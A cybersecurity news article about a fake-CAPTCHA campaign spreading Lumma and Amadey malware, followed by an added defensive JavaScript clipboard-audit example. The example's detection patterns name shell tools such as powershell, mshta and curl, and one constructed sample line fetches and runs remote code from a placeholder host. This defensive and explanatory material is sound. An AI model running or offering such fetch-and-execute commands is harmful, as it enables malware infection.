Malware campaign expands its use of fake CAPTCHAs
Researchers have observed a new campaign delivering malware through a fake CAPTCHA — a test used on websites to distinguish between humans and bots.
The attackers essentially are exploiting web users’ instincts to quickly click through verification tools. This latest example, according to researchers at the Russian cyber firm Kaspersky, primarily victimizes people through online ads, as well as adult sites, file-sharing services, betting platforms, anime websites and web apps that monetize traffic.
Previous reports identified an earlier version of the operation, though these efforts primarily targeted gamers by distributing information-stealing malware on websites hosting cracked games.
The recent campaign, observed from mid-September to October, shows an expansion of the threat actors’ distribution network, likely aiming to reach a broader pool of victims, the Kaspersky researchers said.
To infect users with malware known as Lumma and Amadey, the hackers redirect victims to what appears to be a normal CAPTCHA. Clicking the familiar “I’m not a robot” button, however, copies malicious code to the user’s clipboard, while completing other apparently normal verification steps executes the code.
In some attacks, the malicious script downloads and executes an archive containing the Lumma infostealer, which has been available through a malware-as-a-service model on Russian-speaking forums since at least August 2022.
Once installed on a victim’s device, Lumma searches for files associated with cryptocurrency wallets and steals them, according to Kaspersky. The attackers then attempt to extract cookies and other credentials stored in browsers, including data from password manager archives.
After exfiltrating valuable data, the malware visits pages of various online stores. “The purpose here is likely to generate further revenue for its operators by boosting views of these websites, similar to adware,” the researchers said.
While Lumma has previously been used in fake CAPTCHA attacks, Amadey is a newer addition, according to Kaspersky. Amadey is a botnet that first appeared around 2018 and is currently being sold for about $500 on Russian-speaking hacking forums.
Amadey downloads several modules to steal credentials from popular browsers, detects cryptocurrency wallet addresses in the clipboard, and substitutes them with addresses controlled by the attackers. One module can also take screenshots and, in some cases, download the Remcos remote access tool to the victim’s device, giving the attackers full control.
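The two clipboard behaviours described above, a "CAPTCHA" page that writes a command into the clipboard and malware that swaps a copied wallet address for an attacker-controlled one, are both observable from the defender's side. The following is an added example, not code from the article or from Kaspersky's report: a small clipboard audit hook of the kind a browser extension or an analyst's lab harness could use. The `navigator` stand-in, the alert callback, the origin string and every sample string are constructed for the demo, and the regular expressions are heuristics rather than a complete signature set.

```javascript
// Added example, not from the article or Kaspersky's report. A defender-side
// clipboard audit that (1) flags page-script writes that look like a command
// meant to be pasted and run, and (2) detects a copied wallet address being
// replaced before paste. The navigator stand-in and all sample strings are
// constructed for this demo; the regexes are heuristics, not a complete list.

// Heuristic: text that looks meant for a shell or Run dialog, not for a human.
const COMMAND_MARKERS = [
  /\bpowershell(\.exe)?\b/i,
  /\bmshta(\.exe)?\b/i,
  /\bcmd(\.exe)?\s+\/c\b/i,
  /\b(curl|wget|iwr|invoke-webrequest)\b[^\n]*https?:\/\//i,
  /\b(iex|invoke-expression)\b/i,
  /-(enc|encodedcommand)\b/i,
  /\|\s*(sh|bash)\b/,
];

function looksLikeCommand(text) {
  return COMMAND_MARKERS.some((re) => re.test(String(text)));
}

// Loose address formats: Bitcoin base58 and bech32, Ethereum hex.
const WALLET_PATTERNS = [
  /^[13][1-9A-HJ-NP-Za-km-z]{25,34}$/,
  /^bc1[qpzry9x8gf2tvdw0s3jn54khce6mua7l]{25,87}$/,
  /^0x[0-9a-fA-F]{40}$/,
];

function looksLikeWalletAddress(text) {
  const t = String(text).trim();
  return WALLET_PATTERNS.some((re) => re.test(t));
}

// Inspect one clipboard write by page script. Returns a list of findings
// (empty when nothing is suspicious) so callers can log, block or alert.
function auditClipboardWrite(origin, text) {
  const findings = [];
  if (looksLikeCommand(text)) {
    findings.push({
      kind: 'command-copied-to-clipboard',
      origin,
      preview: String(text).slice(0, 80),
    });
  }
  return findings;
}

// Wrap navigator.clipboard.writeText so every write is audited before it
// lands. Findings are computed synchronously, then the real write runs.
function installClipboardGuard(nav, origin, onAlert) {
  const original = nav.clipboard.writeText.bind(nav.clipboard);
  nav.clipboard.writeText = function (text) {
    auditClipboardWrite(origin, text).forEach((f) => onAlert(f));
    return original(text);
  };
  return nav;
}

// Wallet-swap check: `copied` is what the user copied, `atPaste` is what the
// clipboard holds when they paste. Two different addresses means a swap.
function detectWalletSwap(copied, atPaste) {
  return (
    looksLikeWalletAddress(copied) &&
    looksLikeWalletAddress(atPaste) &&
    String(copied).trim() !== String(atPaste).trim()
  );
}

// Constructed stand-in for the browser's navigator so this runs under Node.
function makeFakeNavigator() {
  const store = { value: '' };
  return {
    clipboard: {
      writeText: (t) => { store.value = t; return Promise.resolve(); },
    },
    store,
  };
}

// Walk-through with constructed inputs; returns what a test can check.
function demo() {
  const alerts = [];
  const nav = installClipboardGuard(
    makeFakeNavigator(),
    'https://captcha.example.invalid', // constructed origin
    (a) => alerts.push(a),
  );

  // A benign write: nothing flagged.
  nav.clipboard.writeText('I am not a robot');
  // A fake-CAPTCHA style write: a command meant to be pasted and run.
  nav.clipboard.writeText('powershell -c "iwr https://example.invalid/v | iex"');

  // Wallet swap: user copied one address, clipboard now holds another.
  const swapped = detectWalletSwap('0x' + 'ab'.repeat(20), '0x' + 'cd'.repeat(20));

  return { alerts, swapped, clipboardNow: nav.store.value };
}

console.log(JSON.stringify(demo(), null, 2));
```

The guard only sees writes made through `navigator.clipboard.writeText`; a page can also use `document.execCommand('copy')` on a selection, so a real extension would hook that path as well. The wallet-swap check is the useful half for the Amadey behaviour: a wallet front end can compare the address the user selected with the address that actually arrives on paste and refuse the transaction when they differ.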
It remains unclear what impact the fake CAPTCHA campaign had or which hacker groups were behind it. However, according to Kaspersky, users in Brazil, Spain, Italy, and Russia were among the most frequently affected.
Daryna Antoniuk is a reporter for Recorded Future News based in Ukraine. She writes about cybersecurity startups, cyberattacks in Eastern Europe and the state of the cyberwar between Ukraine and Russia. She previously was a tech reporter for Forbes Ukraine. Her work has also been published at Sifted, The Kyiv Independent and The Kyiv Post.